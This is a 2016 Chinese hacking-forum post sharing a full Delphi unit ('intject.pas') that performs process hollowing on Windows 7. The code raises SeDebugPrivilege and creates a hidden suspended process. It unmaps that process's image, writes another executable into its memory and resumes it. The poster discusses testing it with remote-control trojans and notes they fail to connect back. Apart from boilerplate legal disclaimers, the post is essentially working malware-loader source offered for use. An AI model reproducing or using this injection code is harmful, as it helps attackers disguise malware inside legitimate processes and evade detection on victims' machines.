HanDs
管理员

[Delphi文章] 注入WIN7的单元 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

EXE整体注入,一般的程序可以正常使用,远控貌似一调用线程,就。。。
反正远控上,我测试,除非套接字,原始连接,然后不调用线程,直接执行函数,不然不上线。
没意思,鸡勒,食之无味弃之可惜

intject.pas

unit intject;
interface
uses
Windows;
var
ZwUnmapViewOfSection:function(ProcessHandle:thandle; BaseAddress:Pointer):LongInt; stdcall;
CreateProcessX:function(lpApplicationName: PChar; lpCommandLine: PChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
//external 'ntdll.dll' name 'ZwUnmapViewOfSection';
type
PImageSectionHeaders = ^TImageSectionHeaders;
TImageSectionHeaders = Array [0..95] Of TImageSectionHeader;
procedure InJect(path,path1:string);
implementation

function ImageFirstSection(NTHeader: PImageNTHeaders): PImageSectionHeader;
Begin
Result := PImageSectionheader(Cardinal(@NTheader.OptionalHeader) +
NTHeader.FileHeader.SizeOfOptionalHeader);
End;

function Protect(Characteristics: ULONG): ULONG;
Const
Mapping :Array[0..7] Of ULONG = (
           PAGE_NOACCESS,
           PAGE_EXECUTE,
           PAGE_READONLY,
           PAGE_EXECUTE_READ,
           PAGE_READWRITE,
           PAGE_EXECUTE_READWRITE,
           PAGE_READWRITE,
           PAGE_EXECUTE_READWRITE);
Begin
Result := Mapping[ Characteristics SHR 29 ];
End;

procedure SetPrivilege;
var
currToken:THandle;
newState:TTokenPrivileges;
prevStateLen:DWORD;
Luid: TLargeInteger;
begin
if OpenProcessToken(GetCurrentProcess,TOKEN_ADJUST_PRIVILEGES,currToken) then //获得进程访问令牌的句柄
begin
    if LookupPrivilegeValue(nil, 'SeDebugPrivilege',Luid) then
    begin
      newState.PrivilegeCount:=1;
      newState.Privileges[0].Attributes:=2;
      newState.Privileges[0].Luid:=Luid;
      prevStateLen:=0;
      AdjustTokenPrivileges(currToken, False, newState, sizeof(TTokenPrivileges),nil, prevStateLen);
    end;
end;
end;

procedure InTo(Buffer: Pointer; ProcessName: String);
Var
ProcessInfo           :TProcessInformation;
StartupInfo           :TStartupInfo;
Context               :TContext;
BaseAddress           :Pointer;
BytesRead             :DWORD;
BytesWritten          :DWORD;
I                     :ULONG;
OldProtect            :ULONG;
NTHeaders             :PImageNTHeaders;
Sections              :PImageSectionHeaders;
Kernel,ntdll:LongWord;
Begin

FillChar(ProcessInfo, SizeOf(TProcessInformation), 0);
fillChar(StartupInfo, SizeOf(TStartupInfo),        0);
StartupInfo.cb := SizeOf(TStartupInfo);
StartupInfo.wShowWindow := SW_HIDE;
{$IFDEF UNICODE}
Kernel:=LoadLibrary('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessW');
{$ELSE}
Kernel:=LoadLibraryW('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessA');
{$ENDIF}
ntdll:=LoadLibrary('ntdll.dll');
ZwUnmapViewOfSection:=GetProcAddress(ntdll,'ZwUnmapViewOfSection');
SetPrivilege;
CreateProcessX(nil,PChar(ProcessName), NIL, NIL, false, CREATE_SUSPENDED, NIL, NIL, StartupInfo, ProcessInfo);
FreeLibrary(Kernel);
Context.ContextFlags := CONTEXT_INTEGER;
GetThreadContext(ProcessInfo.hThread, Context);
ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesRead);
ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress);
if not Assigned(Buffer) then exit;
NTHeaders:= PImageNTHeaders(Cardinal(Buffer) + Cardinal(PImageDosHeader(Buffer)._lfanew));
BaseAddress:= VirtualAllocEx(ProcessInfo.hProcess, Pointer(NTHeaders.OptionalHeader.ImageBase), NTHeaders.OptionalHeader.SizeOfImage,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE);
If not Assigned(BaseAddress) then exit;
WriteProcessMemory(ProcessInfo.hProcess, BaseAddress, Buffer, NTHeaders.OptionalHeader.SizeOfHeaders,BytesWritten);
Sections := PImageSectionHeaders(ImageFirstSection(NTHeaders));
For I := 0 To NTHeaders.FileHeader.NumberOfSections -1 Do
begin
    WriteProcessMemory(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+Sections[I].VirtualAddress), Pointer(Cardinal(Buffer) + Sections[I].PointerToRawData), Sections[I].SizeOfRawData, BytesWritten);
    VirtualProtectEx(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+ Sections[I].VirtualAddress),Sections[I].Misc.VirtualSize,
    Protect(Sections[I].Characteristics),OldProtect);
end;
WriteProcessMemory(ProcessInfo.hProcess,Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesWritten);
Context.Eax := ULONG(BaseAddress)+NTHeaders.OptionalHeader.AddressOfEntryPoint;
Context.SegGs:=0;
Context.SegFs:=$38;
Context.SegEs:=$20;
Context.SegDs:=$20;
Context.SegSs:=$20;
Context.SegCs:=$18;
Context.EFlags:=$3000;
FreeLibrary(ntdll);
if not SetThreadContext(ProcessInfo.hThread, Context) then
        TerminateProcess(ProcessInfo.hProcess, 0)
Else resumeThread(ProcessInfo.hThread);
End;

procedure InJect(path,path1:string);
var
   BytesRead, Module, Size: dword;
   Data: pointer;
begin
    Module := CreateFile(pchar(path), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
    Size := GetFileSize(Module, nil);
    GetMem(Data, size);
    ReadFile(Module, Data^, size, BytesRead, nil);
    InTo(data,path1);
    CloseHandle(Module);
    freemem(data);
end;
end.

 


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
注入 W IN 7 单元
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复